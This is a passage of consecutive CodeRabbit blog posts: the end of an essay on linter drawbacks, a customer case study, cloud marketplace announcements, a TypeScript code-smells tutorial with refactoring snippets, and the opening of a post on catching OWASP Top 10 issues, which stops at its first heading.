        [1, 0, 0],  # Linter: trailing whitespace
        [0, 1, 0],  # Linter: trailing whitespace
        [0, 0, 1]   # Linter: trailing whitespace
    ]

    # What the linter forces you to write instead:
    # return [[1,0,0],[0,1,0],[0,0,1]]  # "Fixed" but less readable
```

As a result, developers sometimes find themselves writing awkward, less-intuitive code just to appease the linter.

## **The Illusion of Automatic Perfection**

Another subtle issue is the risk that teams start treating the linter as a silver bullet for code quality. The presence of a linter and a “clean” linting report might foster a false sense of security. Managers or junior developers might assume that because the code passes all lint checks, it must be good. In reality, linters are just one small tool in a larger toolbox.

When teams focus overly on linting, they may neglect other essential practices like peer reviews, architectural reviews, and thorough testing. As a result, some genuinely critical problems slip through the cracks because everyone was too busy ensuring that the code followed a specific coding style. Experienced developers often resent the notion that a set of automated style checks could replace human judgment and good engineering practices.

## **Perceived Abuse of Power and Control**

Another source of friction is the feeling that linters can be used as a tool of control. If a team or a lead developer sets up extremely strict rules and won’t budge, others can feel micromanaged. Every minor commit leads to lint failures and demands for stylistic changes. Over time, this creates a hostile environment where developers feel their expertise and professional judgment aren’t trusted. Instead of collaboration, the coding style becomes a battleground for power dynamics.

This resentment might not be rational in every case, but it exists. The line between helpful guidance and micromanagement can be thin.
Development teams thrive on trust, respect, and autonomy. Linters, when misused, can undermine all three. ## **The Loss of Creative Freedom** > “Programming is the art of telling another human being what one wants the computer to do. We should continually strive to transform every art into a science: in the process, we advance the art” - Donald Knuth in Art of Programming. Software development, at its core, blends technical precision with creative expression. Developers often craft their code like artisans, choosing specific ways to structure and style their work that reflect their understanding and experience. But when linters enforce rigid rules, they can stifle this creative element. Imagine refactoring a complex code snippet (say a function) to readable, maintainable code, only to have a linter force you to break it up and reshape it according to inflexible rules. The code becomes less a reflection of your thought process and more a product of automated formatting. While consistency has its merits, especially in team settings, this mechanical enforcement can diminish the craft of coding and frustrate experienced developers who have developed their own effective coding styles. ## **Balancing the Benefits and Drawbacks** Despite all these reasons, it’s important to acknowledge that linters aren’t inherently evil. They can be incredibly valuable tools when used thoughtfully. The trick lies in striking a balance: use linters to catch genuine errors or enforce a minimal set of style rules that genuinely improve readability and consistency. Don’t treat them as the ultimate arbiter of “right” and “wrong” code. Allow exceptions when logic dictates that bending a stylistic rule leads to clearer, safer, or more maintainable code. Engage the team in deciding which rules matter and which don’t. 
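As a minimal sketch of what such an exception can look like in practice, ESLint supports inline directive comments that switch a rule off for a small region, with a free-form justification after `--`. The function name, the `Matrix3` type alias, and the choice of the `no-magic-numbers` rule are assumptions made for illustration, not taken from any particular project:

```typescript
// Hypothetical example: an identity matrix where literal numbers are the clearest notation.
type Matrix3 = [
  [number, number, number],
  [number, number, number],
  [number, number, number],
];

function identityMatrix(): Matrix3 {
  /* eslint-disable no-magic-numbers -- literal 0/1 entries are the clearest way to write an identity matrix */
  const m: Matrix3 = [
    [1, 0, 0],
    [0, 1, 0],
    [0, 0, 1],
  ];
  /* eslint-enable no-magic-numbers */
  return m;
}
```

Keeping the justification next to the directive means reviewers can question the exception itself rather than having to rediscover why the rule was bypassed.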
## Good linting practices might include

![](https://victorious-bubble-f69a016683.media.strapiapp.com/4c0b7b5f1061de2ee2aad820bcd83ceaee060b6902d0c4417ee731757f6aed08_4579e0f1a6.png)

* **Start Small and Iterate:** Don’t drop a massive, fully strict configuration onto a **legacy** codebase. Begin with a small subset of rules that address common bugs or glaring style problems. Ramp up slowly, and give developers time to adapt.
* **Team Input on Rules:** Rather than unilaterally choosing a style guide, get the whole team’s input. Aim for consensus and practicality. Keep the ruleset as minimal as possible.
* **Context Matters:** Allow developers to disable certain rules in special cases. Make it easy to mark exceptions inline with comments and ensure these exceptions are justified.
* **Focus on Big Wins:** Emphasize rules that prevent common errors, improve readability, or catch performance pitfalls. De-prioritize those that are purely aesthetic unless they serve a real purpose.
* **Regular Reassessment:** As the codebase evolves and the team changes, revisit the linting rules. Rules that made sense a year ago might not make sense now.

## **To Conclude**

None of this means we should throw away linters. But it does mean we need to be thoughtful about how we implement them. In a world where the complexity of systems continues to grow, tools that aid consistency and catch subtle errors can be invaluable, provided we remember their limitations and respect the human element in writing code.

At [CodeRabbit](https://coderabbit.ai), we take a more intelligent approach to code quality by providing AI-powered code review that complements traditional linting tools with contextual suggestions and semantic understanding, moving beyond surface-level formatting to deliver meaningful code improvements.

Kintsugi: Transforming Remote Software Development Efficiency with CodeRabbit

Manpreet Kaur — Tue, 07 Jan 2025 00:00:00 GMT

## **At a Glance** ### **50% improvement in time to review code and merge PRs** **Vertical:** FinTech **Primary User:** Jeff Gibson, CTO **Coding languages:** Javascript and Python ### **Business Challenges** As a remote-first company growing fast, [Kintsugi](https://trykintsugi.com) wanted to increase efficiency and speed across its global development team. With 20+ developers working asynchronously across multiple time zones, PR cycles had to be fast to avoid long delays due to time zone differences. Their previous automated code review process failed to meet their evolving needs as it was inconsistent and not scalable. ### **Key challenges:** * **Scalability and Consistency:** The initial code review tool wasn’t providing actionable and consistent feedback as the team grew. * **Remote-first Complexity**: Manual first-pass reviews took too long in a fully remote environment where developers only had a few hours of overlapping time with each other daily, slowing down productivity. * **Not another Interface to Manage:** A distributed team required seamless integration into their existing Git workflow without adding yet another UI to manage that would increase operational complexity. ### **AI Code Reviews from CodeRabbit Deliver the Results** [Kintsugi](https://trykintsugi.com) joined the CodeRabbit startup program and saw benefits fast. Over 20 developers were using the platform within a week of signing up, and adoption was high. The benefits were: * **Streamlined PR Cycles:** Developers estimated CodeRabbit’s AI code reviews reduced PR cycle time by 50%, and PR merges were quicker. By automating first-pass reviews the team could focus on high-level business logic and customer experience instead of minor errors or inconsistencies. * **Improved Code Quality:** Consistent and actionable feedback improved bug detection, design suggestions, and tech debt management. 
Customizable settings like "chill vs assertive" mode allowed the team to tune the feedback to their workflow. * **Seamless Integration:** CodeRabbit’s direct integration of AI Code Reviews into the Git workflow eliminated the need for another tool, so the team could work in their existing environment. Support for creating and linking Jira tickets provided context for PRs. * **Remote-First Productivity:** AI Code Reviews allow asynchronous collaboration so that developers across time zones can work without friction during weekends or non-standard hours. *"It’s been a total game-changer for us as a remote-first team. Without it, we’d probably double the time spent on PR cycles."* – **Jeff Gibson, Co-Founder & CTO,** [**Kintsugi**](https://trykintsugi.com) ### **Summary** By adopting CodeRabbit’s AI Code Reviews, Kintsugi overcame its scaling and collaboration challenges in a remote-first environment. CodeRabbit’s robust capabilities that improve the review feedback over time and intuitive user experience delivered streamlined code reviews, reduced PR cycle times by **50%**, and empowered the team to focus on delivering impactful business solutions. **Get Started with CodeRabbit** You can utilize the power of AI Code Reviews with CodeRabbit as well. It takes less than 5 minutes, and no credit card is required, to integrate CodeRabbit with your git platform. [Start Your Free Trial](https://app.coderabbit.ai/login?free-trial), create a new pull request, and watch AI simplify your code reviews in just a few minutes. Questions? Reach out to our team for [support](https://www.coderabbit.ai/contact-us).

CodeRabbit Now Available on GCP Marketplace

Manpreet Kaur — Mon, 23 Dec 2024 00:00:00 GMT

Following the recent announcement of CodeRabbit being available on AWS Marketplace, the CodeRabbit team is excited to announce that we are now also available on [GCP Marketplace](https://console.cloud.google.com/marketplace/product/coderabbit-public/coderabbit)!

Enterprise customers aiming to adopt AI code reviews to deliver higher quality code more efficiently can now use their existing spending agreements with GCP to finance CodeRabbit. This lets teams adopt AI code reviews quickly, without the extensive budgetary approvals that often take months and delay the adoption of AI in the software development workflow. Customers can apply their spending commitments with GCP to purchase CodeRabbit in only a few clicks, allowing the implementation of AI code reviews in days, not months.

Here are the key details:

* The [CodeRabbit Enterprise](https://www.coderabbit.ai/enterprise) plan is supported on GCP Marketplace.
* Customers get CodeRabbit’s self-hosted container image that they can host in their own GCP environments.
* The total purchase amount via GCP Marketplace is eligible to be counted towards the customer’s spend commitments with GCP.
* The minimum developer seat count for a GCP Marketplace purchase is 500 seats.
* 24/7 support and dedicated engineering onboarding assistance are included with every purchase from the marketplace.

Contact the CodeRabbit sales team ([sales@coderabbit.ai](mailto:sales@coderabbit.ai)) for discounted pricing on bulk purchases in the form of a GCP Marketplace private offer that provides better rates tailored to your requirements.

This represents a major advancement in assisting enterprise clients with the difficulties posed by the growing volume of code produced through AI code generators, even as the code review process continues to be predominantly manual.
With the rapid adoption of tools such as GitHub Copilot, Cursor and others, the code generation process has been significantly augmented with AI. Companies aiming to quickly deploy features at scale must also enhance their manual code review process by incorporating automated AI code reviews. Here is how CodeRabbit can help such customers:

1. **Merge PRs 2x - 4x faster:** AI streamlines the initial phase of your code review process and detects bugs or errors in the code considerably faster than manual assessments, enabling you to merge your pull requests (PRs) 2x to 4x quicker and deliver more features with the same team strength.
2. **Fix 90%+ of bugs and errors:** Ensure no crucial mistakes get to production. Manual reviews are susceptible to mistakes and occasionally overlook a significant error, which can be quite costly to rectify in production. With AI code reviews, crucial errors are surfaced consistently, so you can address them during the code review process before they affect any customers.
3. **Enhance Code Quality:** AI code reviews get better with consistent usage. This elevates your development team’s capabilities by making an expert in all languages continuously accessible directly within your Git platform.
4. **Maintain Data Privacy:** Store your code reviews and evaluations within your own infrastructure. Run CodeRabbit’s container image in your self-hosted GCP environment to maintain full control over data privacy and guarantee alignment with your security policies.

Thousands of customers have embraced CodeRabbit to enhance their code review workflows with AI assistance. You can see their statements on [our website](https://coderabbit.ai/).

Ready to implement AI Code Reviews in your software development lifecycle? Reach out to [sales@coderabbit.ai](mailto:sales@coderabbit.ai) and we would love to get you going with CodeRabbit on GCP.

How to Identify and Fix Code Smells in TypeScript using CodeRabbit

Aravind Putrevu — Thu, 19 Dec 2024 00:00:00 GMT

Integrating [AI-powered code reviews](https://www.coderabbit.ai/blog/how-to-automate-typescript-code-reviews-with-coderabbit) in modern development workflows has fundamentally changed how development teams approach TypeScript projects. While TypeScript's built-in features help catch errors early through [static type checking](https://www.coderabbit.ai/blog/boosting-static-analysis-accuracy-with-ai), maintaining overall code quality becomes critical as codebases grow. Traditional code review processes and pair programming can slow development cycles when applied to larger teams or complex systems. This tutorial will demonstrate how to enhance a TypeScript project by identifying code smells and improving code quality in a real-world example—a job board designed for TypeScript developers. Let’s start by looking into what “code smells” are and why they’re important to address! ## Understanding Code Smells and Why They Matter Code smells are signs or patterns that suggest underlying issues in a code’s design or structure. While these issues may not cause immediate bugs or errors, they can lead to problems in the future, such as decreased maintainability, reduced readability, or difficulty in scaling the application. Recognizing and addressing [code smells](https://builtin.com/software-engineering-perspectives/code-smells) is essential for improving code quality and ensuring a more robust and efficient codebase. Some common TypeScript code smells include [long functions](https://maximilianocontieri.com/code-smell-03-functions-are-too-long), [duplicated code](https://code-smells.com/dispensables/duplicate-code), and [complex conditionals](https://luzkan.github.io/smells/conditional-complexity)**,** which can affect performance and readability over time. For any TypeScript project, identifying these early allows developers to refactor and maintain clean code. This is crucial for your application to remain scalable and maintainable as it grows. 
In large projects like [Slack](https://slack.com/), which uses TypeScript to grow its software, code smells can pile up over time, leading to technical debt. This can eventually affect how well the software works for users, which is bad for the business. AI tools help [spot and fix these issues automatically](https://www.coderabbit.ai/blog/how-ai-is-transforming-traditional-code-review-practices) so teams can focus on building new features faster without worrying about code quality.

Let's identify common code smells in TypeScript and explore how to spot them in code snippets.

## Identifying Common Code Smells in TypeScript

Here are key patterns programmers should watch for when reviewing source code:

* **Long Functions:** Functions or class methods that handle too many responsibilities make testing and maintenance challenging.

```typescript
function processJobApplication(job: Job, applicant: Applicant) {
  // handles filtering, validation, notification, etc.
  // too many responsibilities in one function
}
```

* **Duplicated Code:** Repeated code fragments across multiple places indicate refactoring opportunities.

```typescript
function displayJobTitle(job: Job) {
  console.log(job.title);
}

function showJobTitle(job: Job) {
  console.log(job.title);
}
```

* **Complex Conditionals:** Nested or complicated conditions can make code difficult to understand and debug.

```typescript
if (job.salary > 50000 && job.location === 'remote' && job.type === 'full-time') {
  // complex logic that could be simplified
}
```

Manual code reviews can be time-consuming when dealing with large codebases, especially when [identifying and addressing code smells](https://www.coderabbit.ai/blog/coderabbit-deep-dive) in functions such as those for filtering jobs or displaying job details. Using a TypeScript job board project, the section below will demonstrate how AI-powered code review tools can automatically detect and flag these issues, making it easier to refactor your code efficiently.
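Before moving on, here is one way the three smells above could be refactored. This is only a sketch: the `Job` and `Applicant` shapes, the helper names, and the validation rules are assumptions made for illustration, and the job board's real types may differ.

```typescript
// Hypothetical shapes; the tutorial's real Job and Applicant types may differ.
interface Job {
  title: string;
  salary: number;
  location: string;
  type: string;
}

interface Applicant {
  name: string;
  email: string;
}

// Long function -> small single-purpose steps.
function validateApplicant(applicant: Applicant): string[] {
  const problems: string[] = [];
  if (applicant.name.trim() === '') problems.push('name is required');
  if (!applicant.email.includes('@')) problems.push('email looks invalid');
  return problems;
}

// Complex conditional -> a named predicate built from named parts.
function isWellPaidRemoteFullTime(job: Job): boolean {
  const isWellPaid = job.salary > 50000;
  const isRemote = job.location === 'remote';
  const isFullTime = job.type === 'full-time';
  return isWellPaid && isRemote && isFullTime;
}

// Duplicated code -> one shared helper instead of two identical functions.
function formatJobTitle(job: Job): string {
  return job.title;
}

// The top-level function now only coordinates the smaller steps.
function processJobApplication(job: Job, applicant: Applicant): string {
  const problems = validateApplicant(applicant);
  if (problems.length > 0) {
    return `Rejected: ${problems.join(', ')}`;
  }
  const tag = isWellPaidRemoteFullTime(job) ? ' (remote, full-time)' : '';
  return `Application received for ${formatJobTitle(job)}${tag}`;
}
```

Each helper can now be tested on its own, and the condition reads as a sentence rather than a chain of comparisons.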
## Setting up the TypeScript Job Board This tutorial will walk you through creating a job board application where you'll implement type-safe features and use an AI-powered code review tool to catch potential issues. ## Prerequisites You must have the following to get started: * Familiarity with TypeScript, React, or Next.js. * Node.js, npm installed. * [Shadcn UI](https://ui.shadcn.com/) installed * [CodeRabbit](https://coderabbit.ai/) account. * [VS Code](https://code.visualstudio.com/) (or another code editor). To set up the job board quickly, clone the [repository from GitHub](https://github.com/Tabintel/typescript-job-board), install dependencies, and run the app locally with the commands below: 1. Clone the repository: ```bash git clone https://github.com/Tabintel/typescript-job-board.git ``` 2. Install dependencies: ```bash cd typescript-job-board npm install ``` 3. Run the application: ```bash npm run dev ``` 4. Open `localhost:3000` in your browser to view the TypeScript job board: ![TypeScript job board built with Next.js and TypeScript](https://paper-attachments.dropboxusercontent.com/s_154FEC08EAA1C20DB5AAA26FB7C21BD8E180657876D929ACDE45DFB50C6FE7E1_1729353030201_image.png) The job board is designed to help TypeScript developers find job opportunities. It includes a sidebar for filtering jobs, dynamically generated job cards, and a responsive layout. With the application up and running, let’s focus on how AI code review tools like [CodeRabbit](https://www.coderabbit.ai/blog/boosting-engineering-efficiency) can help us catch and address code smells. ## Setting up AI-Powered Code Review [Create an account](https://app.coderabbit.ai/login?free-trial) and follow the [integration guidelines in the documentation](https://docs.coderabbit.ai/#integration-with-github-gitlab-and-azure-devops) to integrate AI into your workflow. Once installed, you can start utilizing AI to streamline code reviews and maintain high-quality standards in your TypeScript projects. 
To activate the review process, create a branch on your repository, make code updates, push, and initiate a pull request (PR). Let’s create a new feature for the job board application by running the command below in the terminal:

```bash
git checkout -b feature/job-application-form
```

This feature will allow TypeScript developers using the job board to apply for jobs directly through the platform. The components include:

* TypeScript interfaces for form data validation.
* Strongly typed form handling with React state management.
* Type-safe event handlers for form submissions.

Next, create a `JobApplicationForm` component in the `src/app/components/` directory and enter the code from this [GitHub gist](https://gist.github.com/Tabintel/74675122f48d70486295e2d5a00bdb14). Once you've added the code, commit and push the changes to your GitHub repository using the following commands:

```bash
git add src/app/components/JobApplicationForm.tsx
git commit -m "feat: add job application form with TypeScript"
git push origin feature/job-application-form
```

Then, navigate to your GitHub repository, where you’ll see a prompt to create a pull request from the new branch. Create the **pull request** (PR) with a descriptive title and description of the new feature.

![Create a Pull Request](https://paper-attachments.dropboxusercontent.com/s_154FEC08EAA1C20DB5AAA26FB7C21BD8E180657876D929ACDE45DFB50C6FE7E1_1732378453779_image.png)

The pull request triggers an AI-powered code review process, analyzing the source code for potential code smells and areas needing refactoring.
![CodeRabbit review process](https://paper-attachments.dropboxusercontent.com/s_154FEC08EAA1C20DB5AAA26FB7C21BD8E180657876D929ACDE45DFB50C6FE7E1_1729686687508_CodeRinProd.png) ## Analysis and Review of the Code Smells After creating the PR, AI-powered code review tools automatically analyze your code, identify several issues, and add a nice poem for the job board, as indicated in the image: ![CodeRabbit’s walkthrough for the code review](https://paper-attachments.dropboxusercontent.com/s_154FEC08EAA1C20DB5AAA26FB7C21BD8E180657876D929ACDE45DFB50C6FE7E1_1729769878888_image.png) It suggests code that can be refactored to fix the code smell, as shown below: ![Code smells highlighted by CodeRabbit](https://paper-attachments.dropboxusercontent.com/s_154FEC08EAA1C20DB5AAA26FB7C21BD8E180657876D929ACDE45DFB50C6FE7E1_1729688179743_image.png) It also highlights code smells in the TypeScript code that are potential issues: ![Other code smells in the TypeScript code](https://paper-attachments.dropboxusercontent.com/s_154FEC08EAA1C20DB5AAA26FB7C21BD8E180657876D929ACDE45DFB50C6FE7E1_1729769484819_image.png) Let's break down the **code smells** found in `JobApplicationForm.tsx` by looking at the original code and also reviewing the improvements and suggestions from the automated review. **Inadequate State Management** The existing code shows common code smells in state management. Without clear loading indicators and error-handling states, users are left without feedback during form submissions, which can result in a confusing user experience. AI code review tools help identify and suggest strategies to address such gaps. ![State management code smell spotted by CodeRabbit with suggestions](https://paper-attachments.dropboxusercontent.com/s_154FEC08EAA1C20DB5AAA26FB7C21BD8E180657876D929ACDE45DFB50C6FE7E1_1730288226894_scode1.png) The solution from the AI code review introduces **comprehensive state management with loading and error states**. 
The `isSubmitting` flag enables proper loading indicators, while the error state allows for meaningful error messages. The default TypeScript experience is set to one year, providing job applicants with a more realistic starting point.

```typescript
// CodeRabbit's Improved Solution
const [isSubmitting, setIsSubmitting] = useState(false)
// Typed explicitly so that setError can accept an error message string later
const [error, setError] = useState<string | null>(null)
const [application, setApplication] = useState({
  position: '',
  yearsOfTypeScript: 1, // Better default value
  githubProfile: '',
  email: '',
  portfolioUrl: ''
})
```

**Missing Error States**

From the review below, the **form submission handler lacks proper error handling** and doesn't manage the submission lifecycle. This can lead to silent failures and provide no feedback to users when something goes wrong.

![Error handling code smell spotted by CodeRabbit](https://paper-attachments.dropboxusercontent.com/s_154FEC08EAA1C20DB5AAA26FB7C21BD8E180657876D929ACDE45DFB50C6FE7E1_1730930421627_main+errr.png)

The improved submission handler **implements a proper async/await pattern** with comprehensive error handling. It manages the entire submission lifecycle, from setting loading states to handling errors and success cases, making sure users always know the status of their submission.

```typescript
const handleSubmit = async (e: React.FormEvent) => {
  e.preventDefault()
  try {
    setIsSubmitting(true)
    setError(null)
    await submitApplication(application)
    // Show success message
  } catch (err) {
    setError(err instanceof Error ? err.message : 'Submission failed')
  } finally {
    setIsSubmitting(false)
  }
}
```

**Untyped Promise Response**

Using the `any` type for Promise return values undermines TypeScript’s type safety and reduces clarity for other developers. Strongly typed return values and input validation are the recommended approach.
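To make the risk concrete, here is a small sketch that is not taken from the job board project. `SubmissionResult`, `submitUntyped`, `submitTyped`, and `demo` are hypothetical names used only to contrast the two approaches:

```typescript
// Hypothetical result shape for illustration.
interface SubmissionResult {
  success: boolean;
  message?: string;
}

// With `any`, the compiler accepts any property access on the resolved value.
function submitUntyped(): Promise<any> {
  return Promise.resolve({ success: true });
}

// With an explicit type, misspelled or missing properties become compile-time errors.
function submitTyped(): Promise<SubmissionResult> {
  return Promise.resolve({ success: true, message: 'ok' });
}

async function demo(): Promise<[unknown, boolean]> {
  const loose = await submitUntyped();
  const typo = loose.sucess; // compiles despite the misspelling; undefined at runtime

  const strict = await submitTyped();
  // Writing strict.sucess here would fail to compile:
  // the property does not exist on SubmissionResult.
  return [typo, strict.success];
}
```

The misspelled property in the untyped version only shows up as an `undefined` value at runtime, whereas the typed version would stop the same mistake at compile time.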
![Untyped promise response code smell spotted by CodeRabbit](https://paper-attachments.dropboxusercontent.com/s_154FEC08EAA1C20DB5AAA26FB7C21BD8E180657876D929ACDE45DFB50C6FE7E1_1730930543721_hmb.png)

The automated code review tool **implements proper typing** for the Promise return value and adds input validation. This maintains type safety throughout the application flow and provides clear feedback for validation errors.

```typescript
const submitApplication = (data: JobApplication) => {
  return new Promise<{ success: boolean; message?: string }>((resolve, reject) => {
    // Reject early on obviously invalid input
    if (!data.email.includes('@')) {
      reject(new Error('Invalid email format'))
      return
    }
    resolve({ success: true, message: 'Application submitted successfully' })
  })
}
```

**Poor Accessibility**

The form **lacks proper accessibility attributes**, making it difficult for screen readers to provide meaningful information to users who rely on assistive technologies.

![Poor Accessibility code smell spotted by CodeRabbit](https://paper-attachments.dropboxusercontent.com/s_154FEC08EAA1C20DB5AAA26FB7C21BD8E180657876D929ACDE45DFB50C6FE7E1_1730930788568_image.png)

The enhanced form includes proper [ARIA attributes and roles](https://developer.mozilla.org/en-US/docs/Web/Accessibility/ARIA/Roles), making it accessible to screen readers and assistive technologies. The `noValidate` attribute allows for custom form validation while maintaining accessibility.

Through this automated code review process, you’ve learned valuable lessons about TypeScript development. **Proper type definitions** serve as both documentation and compile-time safeguards. **Error handling** becomes more predictable when properly typed, and **accessibility features** become natural parts of the development process rather than afterthoughts.

## Continuously Improving Code Quality with AI Code Reviews

Incorporating AI-powered code review tools brings lasting improvements to your development process.
Here's how it helps improve both your source code quality and overall development efficiency:

* **Efficient Development**: With automated code review tools continuously identifying code smells during development, programmers can focus on building better software features while spending less time on manual code reviews and pair programming sessions.
* **Technical Debt Prevention**: By detecting and addressing code smells early, development teams keep small problems from escalating into complex issues. This proactive approach to cleaner code keeps codebases maintainable across functions and class methods.
* **Enhanced Code Quality**: Clean, organized source code with proper type information minimizes bugs and errors. The systematic use of primitive types and type inference makes scaling easier, allowing open-source projects to evolve smoothly as new functionality is added.

## What’s Next?

Now that you have learned how to identify and address code smells in TypeScript using AI-powered code review, here are some next steps to enhance your development process:

1. **Refining TypeScript Practices**: As you continue to improve your codebase, focus on TypeScript’s more advanced features, such as [generics](https://www.typescriptlang.org/docs/handbook/2/generics.html) and [type inference](https://www.typescriptlang.org/docs/handbook/2/everyday-types.html#type-inference). These can lead to better maintainability and fewer runtime errors.
2. **Integrating AI with Human Insights**: While [AI code review tools](https://www.coderabbit.ai/blog/how-ai-is-transforming-traditional-code-review-practices) like CodeRabbit are powerful, they should be balanced with human insights. Encourage team members to review AI-generated feedback and add their own perspectives to build a culture of learning and continuous improvement.
3. **Staying Up to Date**: TypeScript constantly evolves with new features and updates. Monitor the [latest changes](https://devblogs.microsoft.com/typescript/), such as [stricter types](https://www.typescriptlang.org/tsconfig/#strict) or [improved tooling](https://www.typescriptlang.org/docs/handbook/typescript-tooling-in-5-minutes.html), to incorporate better practices and avoid potential pitfalls.

## Final Thought

AI tools empower developers to analyze TypeScript (or other programming languages) source code, identify common code smell patterns, and act on refactoring opportunities that raise code quality. The development workflow becomes faster and more efficient, enabling teams to ship software confidently.

Ready to enhance your TypeScript projects with better software practices? [Sign up for CodeRabbit](https://coderabbit.ai/) today and experience the benefits of AI-powered code reviews.

CodeRabbit Now Available on AWS Marketplace

Sahil Mohan Bansal — Tue, 17 Dec 2024 00:00:00 GMT

The CodeRabbit team is excited to announce that we are now available on [AWS Marketplace](https://aws.amazon.com/marketplace/pp/prodview-wkkkre4fgelwq)! Enterprise customers looking to implement AI code reviews in order to ship better quality code in less time can now leverage their existing spend commitments with AWS to pay for CodeRabbit. This allows customers to adopt AI-powered code reviews more rapidly, in just a few clicks, without having to go through lengthy budgetary approvals.

Here are the key details:

* The [CodeRabbit Enterprise](https://www.coderabbit.ai/enterprise) plan is supported on AWS Marketplace.
* Customers get CodeRabbit’s self-hosted container image that they can host in their own AWS EKS or ECS environments.
* The total purchase amount via AWS Marketplace is eligible to be counted towards the customer’s spend commitments with AWS.
* The minimum developer seat count for an AWS Marketplace purchase is 500 seats.
* 24x7 support and dedicated onboarding engineering support are included with all Marketplace purchases.

Reach out to the CodeRabbit sales team ([sales@coderabbit.ai](mailto:sales@coderabbit.ai)) for discounted bulk pricing in the form of an AWS Marketplace private offer that meets your needs.

This is a significant step forward in helping enterprise customers deal with the ever-increasing quantity of code being generated with AI while the code review process remains largely manual. With the rapid adoption of tools such as GitHub Copilot, the code generation process has been augmented with AI. Enterprises that want to ship features rapidly, at scale, also need to augment their manual code review process with automated AI code reviews. Here is how CodeRabbit can help such customers:

1. **Merge PRs 2x - 4x faster:** AI automates the first pass of your code review cycle and finds bugs or errors in the code much faster than manual reviews, allowing you to merge your pull requests (PRs) 2x to 4x faster and ship more features with the same team size.
2. **Catch 90%+ bugs and errors:** Keep critical errors from reaching production. Manual reviews can be error prone and sometimes miss a critical error, which can be very expensive to fix in production. With AI code reviews, you stay on top of critical errors and catch them during the code review cycle, before they impact any customers.
3. **Improve Code Quality:** AI code reviews improve over time the more you use them. This raises the floor of your development team by making an expert in all languages always available directly in your existing Git platform.
4. **Maintain Data Privacy:** Keep your code reviews and analysis in your own private infrastructure. Run CodeRabbit’s container image in your self-hosted environment for complete control over data privacy and to ensure compliance with your security policies.

Thousands of customers have already adopted CodeRabbit to improve their code review process using AI. You can read what they are saying on [our website](https://coderabbit.ai/).

Ready to implement AI Code Reviews in your software development lifecycle? Reach out to [sales@coderabbit.ai](mailto:sales@coderabbit.ai) and we would love to get you going with AI Code Reviews.

*p.s. - yes, support for GCP and Azure Marketplaces is coming very soon too!*

How to Automate OWASP Security Reviews in Your Pull Requests?

Atulpriya Sharma — Mon, 16 Dec 2024 00:00:00 GMT

The increasing reliance on web applications has made security a paramount concern for organizations worldwide. As these applications become more interconnected, robust security is crucial. [Recent reports](https://www.techradar.com/pro/security/ai-tools-are-being-increasingly-abused-to-launch-cyberattacks) indicate a rise in AI-driven attacks, with over 500,000 incidents occurring daily, including attacks on retail APIs, DDoS attacks, and advanced phishing campaigns that capitalize on GenAI capabilities. This has led to the emergence of AI Red Teaming startups that simulate these threats to identify and mitigate vulnerabilities proactively.

AI-driven applications, including those built on large language models (LLMs), have introduced unique challenges like prompt injection and data poisoning, underscoring how the battlefield is constantly evolving. To address these threats, many organizations turn to the Open Web Application Security Project (OWASP), a nonprofit foundation dedicated to improving software security by providing resources and guidance on developing secure applications.

In this blog post, we’ll explore how to detect and address these vulnerabilities before production, minimizing the risk of breaches and enhancing the overall security of applications.

## OWASP 101

[OWASP’s](https://owasp.org/) mission is to provide free resources, tools, and documentation to help protect applications from attackers. It supports the global developer and security communities through training, best practices, conferences, and community-driven projects that tackle emerging security threats. The [OWASP Top 10](https://owasp.org/www-project-top-ten/) lists the most prevalent security risks and serves as an essential resource for building secure applications.
The organization emerged in response to the growing intricacy and interconnectedness of web applications, which have created numerous potential vulnerabilities that malicious actors could exploit.

![](https://victorious-bubble-f69a016683.media.strapiapp.com/adb080b98cabd344d06c5162168dc243966547b7bbcd3f4f75c8e1240716e9c6_94b60c168b.png)

Below are the OWASP Top 10 vulnerabilities, each representing a critical risk to the security of web applications:

1. **Broken Access Control:** Unauthorized access to resources due to improper restrictions.
2. **Cryptographic Failures:** Weak encryption or improper handling of sensitive data.
3. **Injection:** Untrusted data affecting queries or commands, leading to code execution.
4. **Insecure Design:** Security flaws in system architecture or design.
5. **Security Misconfiguration:** Inadequate system configurations leading to vulnerabilities.
6. **Vulnerable and Outdated Components:** Use of insecure or outdated software components.
7. **Identification and Authentication Failures:** Weak or flawed authentication mechanisms.
8. **Software and Data Integrity Failures:** Lack of checks for untrusted data or tampered software.
9. **Security Logging and Monitoring Failures:** Insufficient logging or monitoring of security events.
10. **Server-Side Request Forgery (SSRF):** An attacker tricks the server into sending unauthorized requests.

Manual code reviews are essential for identifying risks, but even with the best efforts, catching every deviation from secure coding practices in a complex system is difficult. This is where automated code review tools like CodeRabbit come into play. They help identify vulnerabilities early in the development process and minimize the risk of security issues making it into production. With CodeRabbit, the review process can be streamlined, ensuring faster identification and resolution of security risks and helping developers stay ahead of potential threats.
## Finding OWASP Violations With CodeRabbit

We developed a React web application intentionally configured with security violations to demonstrate CodeRabbit's effectiveness in identifying OWASP's Top 10 vulnerabilities. These included common missteps such as insecure authentication, unvalidated inputs, and missing encryption, all of which violate key OWASP guidelines. The diagram below gives a high-level overview of the application.

![](https://victorious-bubble-f69a016683.media.strapiapp.com/b114bb86847f6a13a6386d043ca5a2424544961a832f05cab741b0d6f9df6231_16cd634b33.png)

Before diving into the details, here's a high-level overview of the flow of interactions between the client, authentication, and profile services in the application.

* The user enters credentials in the Login Component and submits the form.
* A POST request is sent to the `/login` endpoint in the Authentication Service.
* The `/login` endpoint verifies credentials using SQLite with MD5 password hashing.
* A token and user data are stored in Local Storage.
* The user is redirected to the Dashboard Component upon successful login.
* The Dashboard sends GET requests to the `/profile` and `/fetch-avatar` endpoints in the Profile Service.

You can find the web app in this [GitHub Branch](https://github.com/coderabbitai/coderabbit-pr-review/tree/owasp-top10). With just **two clicks**, we [integrated CodeRabbit](https://docs.coderabbit.ai/getting-started/quickstart) into the repository. When a pull request is created, CodeRabbit performs an automatic review and generates a detailed security report with three key sections.

![](https://victorious-bubble-f69a016683.media.strapiapp.com/7579a4406bebdf6b0868b43198258bd4719c52c8434ce1e75d4b869db62912e7_d75d3f5a44.png)

* **Summary**: Highlights major security concerns and areas that need immediate attention.
* **Walkthrough**: Provides a step-by-step breakdown of the reviewed files, pointing out specific issues and offering actionable recommendations.
* **Table of Changes**: Lists all the files modified, with a summary of detected issues, helping developers prioritize fixes.

![](https://victorious-bubble-f69a016683.media.strapiapp.com/322742877bde1b12a6c5cdde0754a08171a36b2e439479d334bfa3e9d7c7d21d_a440bf163e.png)

Here are the five OWASP risks that were successfully identified, along with suggested fixes to enhance application security.

### **Broken Access Control (A01:2021)**

